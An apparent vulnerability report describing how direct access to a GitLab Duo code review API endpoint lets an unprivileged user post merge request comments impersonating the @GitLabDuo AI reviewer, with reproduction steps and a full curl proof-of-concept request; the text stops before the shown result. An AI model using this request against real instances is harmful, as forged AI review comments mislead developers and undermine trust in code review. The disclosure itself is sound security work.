Direct API access allows Duo Code Review spoofing
Summary
Direct API access to POST /api/v4/ai/duo_workflows/code_review/add_comments allows spoofing AI MR Review comments as the @GitLabDuo user.
Steps to reproduce
On GDK:
- Create user PAT, the user does not need to be assigned a Duo seat, the user does not need to be a project member.
- Pick a public project ID the user has access to, the project does not need to be Duo enabled
- Pick a MR IID from the project and note the path of a changed file in the MR
- Create a payload to let @GitLabDuo comment on the MR:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: localhost:8080' -H $'User-Agent: curl/8.14.1' -H $'Accept: */*' -H $'Private-Token: MYPAT' -H $'Content-Type: application/json' \
--data-binary $'{\"project_id\":\"MYPROJECTID\",\"merge_request_iid\":MYMRIID,\"review_output\":\"<review>\\n<comment file=\\\"CHANGEDFILENAME\\\" old_line=\\\"\\\" new_line=\\\"1\\\">This is fine!!! :fire: \\n<from>http.HandleFunc(\\\"/hello\\\", helloHandler)</from>\\n<to>http.HandleFunc(\\\"/hellow\\\", helloHandler)</to>\\n</comment>\\n</review>]\"\x0d\x0a}\x0d\x0a\x0d\x0a' \
$'http://MYGDKHOST:MYGDKPORT/api/v4/ai/duo_workflows/code_review/add_comments'And fill MYPAT, MYPROJECTID, MYMRIID and CHANGEDFILENAME accordingly.
The result should look like so:
